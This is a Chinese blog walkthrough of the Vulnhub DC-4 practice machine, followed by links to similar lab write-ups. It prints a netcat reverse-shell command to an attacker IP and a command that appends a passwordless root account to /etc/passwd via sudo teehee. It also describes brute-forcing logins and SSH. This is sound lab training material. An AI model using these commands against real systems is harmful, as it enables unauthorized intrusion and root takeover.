[Vulnhub] DC-4靶机渗透

最新推荐文章于 2024-07-26 16:34:21 发布
最新推荐文章于 2024-07-26 16:34:21 发布
阅读量150 收藏
点赞数
分类专栏: 靶场笔记 文章标签: linux 渗透测试 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45605352/article/details/119428899
版权

0x00 环境搭建

靶机地址:https://www.vulnhub.com/entry/dc-4,313/
下载之后用vmware打开即可,使用桥接模式。
开机后搭建完成:
在这里插入图片描述

0x01 主机端口探测

arp-scan -l探测内网存活主机,再用nmap -sV -p- ip来探测端口:
在这里插入图片描述
发现只开启了80端口(HTTP服务)和22端口(SSH服务)

0x02 web渗透

访问80端口,发现只有一个登录页面:
在这里插入图片描述
dirsearchxray 扫了之后也没发现什么有价值的东西,看来只能暴破了:
在这里插入图片描述
得到账户名密码为 admin/happy 成功登录:
在这里插入图片描述
看到这里可以执行命令,盲猜是个RCE
在这里插入图片描述
抓包修改参数执行命令:
在这里插入图片描述

0x03 RCE 反弹 shell

直接弹个shell,这里bash命令不行,构造payload用nc反弹shell:

nc 192.168.43.84 4444 -e /bin/bash

攻击机监听,得到反弹shell:
在这里插入图片描述
查看用户发现有三个用户:charles、jim、sam;只有jim用户中存在可用信息,当前用户没有权限查看mobx文件,并获得一个密码本:
在这里插入图片描述
用该密码本成功暴出 ssh 连接账户和密码:
在这里插入图片描述
登录jim账户查看mbox文件内容:
在这里插入图片描述
发现这是一封 root 用户发的邮件,在/var/mail文件夹中找到一封邮件含有 charles 用户的 password:
在这里插入图片描述

0x04 修改/etc/passwd提权

切换到 charles 用户,使用sudo -l看到当前用户可以用 root 权限执行teehee命令:
在这里插入图片描述
teehee -a命令可以写入文件内容并不覆盖文件原有内容:
在这里插入图片描述
使用teehee命令将一个无密码用户hacker写入到/etc/passwd文件,并加入到root组中:

echo "hacker::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

然后切换用户拿到 flag:
在这里插入图片描述

总结

整体流程如下:
主机发现 => 端口扫描 => 访问web服务 => 暴力破解 => RCE => 反弹shell => 拿到密码本暴破ssh => ssh登录发现另一用户密码 => 切换用户后可以用 root 权限执行teehee命令 => 修改/etc/passwd提权 => 拿到flag

感觉没有DC-3丰富,前面步骤相对简单,难点基本都在提权上。学习了修改/etc/passwd提权的思路。

参考链接:
https://zhuanlan.zhihu.com/p/91314269(Vulnhub之路Ⅶ——DC-4)

yAnd0n9
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Dc-4靶机渗透----burpsuite抓包与爆破、hydra、sudo、teehee提权、/etc/passwd的使用
z2560088的博客
09-27 582
nmap扫描,扫描出80端口和ssh端口 先访问http服务。再用whatweb和dirb扫描该网站,发现既没有cms有没有相关的文件可以查看 那我们只能抓包爆破,或者海德拉爆破,账号其实有提示了大概就是admin,只需破解password即可 爆破得到admin:happy 登录 继续执行命令抓包 修改radio的值 使用nc nc 192.168.160.129 777 -e /bin/bash 改成nc+192.168.160.129+777+-e+/b...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 1518
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
vulnhub DC-5 靶机 渗透测试
小松博客
05-23 264
我们把这个文件复制出来 /usr/share/exploitdb/exploits/linux/local/41154.sh。进入shell模式,输入命令find / -perm /4000 2>/dev/null,查找具有SUID权限的命令。发现这下面的时间是在变的,每次刷新都不一样,这里和footer.php的php是一样的,所以我们推测是文件包含漏洞。注意,请不要在kali里面编译,亲测编译后的程序在靶机运行会报错,我是在Centos中编译的。发现一个footer.php,发现每次访问都不一样。
[Vulnhub] DC-1靶机渗透
weixin_45605352的博客
08-03 225
0x00 环境搭建 靶机地址:https://www.vulnhub.com/entry/dc-1,292/ 下载之后用vmware打开即可,使用桥接模式。 开机后搭建完成: 0x01 主机端口探测 用arp-scan -l 探测内网存活主机,再用nmap -sV -p- ip来探测端口: 发现开启了22端口(SSH服务)、80端口(HTTP服务)、111端口和57345端口(RPC服务) 0x02 web渗透 访问80端口 ...
[Vulnhub] DC-9靶机渗透
weixin_45605352的博客
08-10 465
0x00 环境搭建 靶机地址:http://www.vulnhub.com/entry/dc-9,412/ 下载之后用vmware打开即可,使用桥接模式。 开机后搭建完成: 0x01 主机端口探测 用arp-scan -l探测内网存活主机,再用nmap -sV -p- ip来探测端口: 发现开启了80端口(HTTP服务),22端口存在过滤机制(SSH服务) 0x02 web渗透 访问80端口,没判断出是什么CMS: 目录扫描,发现登录入口: xray扫描出一个sql注入: 尝试注入: 丢到
vulnhub DC-4 靶机 渗透测试
小松博客
05-21 140
尝试sudo -l查看可以使用的命令,发现没权执行sudo,然后又找了半天,在/var/mail找到了一个叫jim的文件,打开是一封信,里面有个密码^xHhA&hvim0y,发信人是Charles。设置用户名为admin,因为虽然我们不确定他的用户名百分百是admin,但是在网页内容上显示的是Admin Information Systems Login,借此我们可以假定用户名是admin。登陆进去以后,发现一个List file功能,可以列出文件列表,通过抓包发现他发送的是一个system命令。
DC-4靶机渗透测试详细教程
啊醒的博客
05-04 3881
DC-4靶机渗透测试详细教程
VulnHub系列 DC-4靶机 渗透详细过程 | 红队打靶
rumil的博客
04-17 1275
通过test.sh脚本的提示信息,再加上查看发现的backups目录当中有密码信息,通过我们得到的三个用户名信息,再加上这个密码信息,可以尝试ssh爆破登录,观察是否可成功爆破出ssh用户的登录密码。回到后台,等登录即可,进入后台,发现有命令工具,进入查看,点击run,发现执行了ls -l命令得回显内容,抓包看一下。然后我们再次通过charles用户进行远程登录,成功登录,发现也有邮件,查看一下,并无有用的信息。去往此目录,查看jim文件得内容信息,发现charles发来的邮件,并有连接密码。
dc-4 靶机渗透学习
..
03-19 3077
信息收集 第一步还是老办法,探测主机存活。 nmap -sP 192.168.202.0/24 通过推断得出192.168.202.142是靶机,具体请看dc-2、dc-3,对靶机进行端口扫描。 nmap -A -p- -v 192.168.202.142 发现22、80端口开启,访问一下80端口,发现是个登录页面。 用Wappalyzer识别框架,没试别出,查看源代码发现只是一个简单的登录界面 这种情况感觉没必要再用nikto扫描了,尝试用bp爆...
vulnhub靶场 DC-1靶机 渗透详细过程
最新发布
黑战士的博客
07-26 1015
1.扫描局域网主机netdiscover用法2.开放端口扫描2.MSF使用3.hydra爆破:sudo hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.0.100hydra+John密码包以上两种方式可以爆出flag4的密码4.suid提权:Linux下用SUID提权、find命令exec。
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Pikachu靶场通关笔记
热门推荐
weixin_45605352的博客
03-27 1万+
一. Burte Force(暴力破解) “暴力破解”是一攻击具手段,在web攻击中,一般会使用这种手段对应用系统的认证信息进行获取。 其过程就是使用大量的认证信息在认证接口进行尝试登录,直到得到正确的结果。 为了提高效率,暴力破解一般会使用带有字典的工具来进行自动化操作。 理论上来说,大多数系统都是可以被暴力破解的,只要攻击者有足够强大的计算能力和时间,所以断定一个系统是否存在暴力破解漏洞,其条件也不是绝对的。 我们说一个web应用系统存在暴力破解漏洞,一般是指该web应用系统没有采用或者采用了比较弱的
DVWA靶场通关笔记
weixin_45605352的博客
03-17 2653
文章目录Brute Force 暴力破解LowMediumHighImpossible防护总结:Command Injection 命令注入危害:LowMediumHighImpossible防护总结:CSRF 跨站请求伪造危害:LowMediumHighImpossible防护总结:File Inclusion 文件包含危害:LowMediumHighimpossible防护总结:File Upload 文件上传危害:LowMediumHighImpossible补充常见解析漏洞:防护总结:Insecur
[Vulnhub] serial-php反序列化漏洞
weixin_45605352的博客
05-05 791
0x01 环境搭建 漏洞环境:https://www.vulnhub.com/entry/serial-1,349/ 下载后使用Vmware打开 创建新的虚拟机: 选择客户机版本为Ubuntu 64位: 一直下一步,知道选择使用现有磁盘: 选择下载的vmdk磁盘文件: 开机,环境配置完成: 0x02 漏洞复现 探测主机存活及端口 用nmap探测主机存活,探测到存活主机192.168.1.111,开放了22端口和80端口: nmap -PS -T4 192.168.1.0/
[Vulnhub] PWNLAB-init Linux利用环境变量提权
weixin_45605352的博客
05-18 531
0x00 环境搭建 靶机地址:https://www.vulnhub.com/entry/pwnlab-init,158/ 下载之后用vmware打开即可,这里使用的是桥接模式。 开机后搭建完成: 0x01 主机端口探测 用arp-scan -l 探测内网存活主机,再用nmap -sV -p- ip来探测端口: 发现开放了80端口(HTTP服务)和3306端口(MySQL服务)。 0x02 web渗透 访问80端口,没有发现什么可以利用的点: 用nikto扫描,发现了config.php,里面可能
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值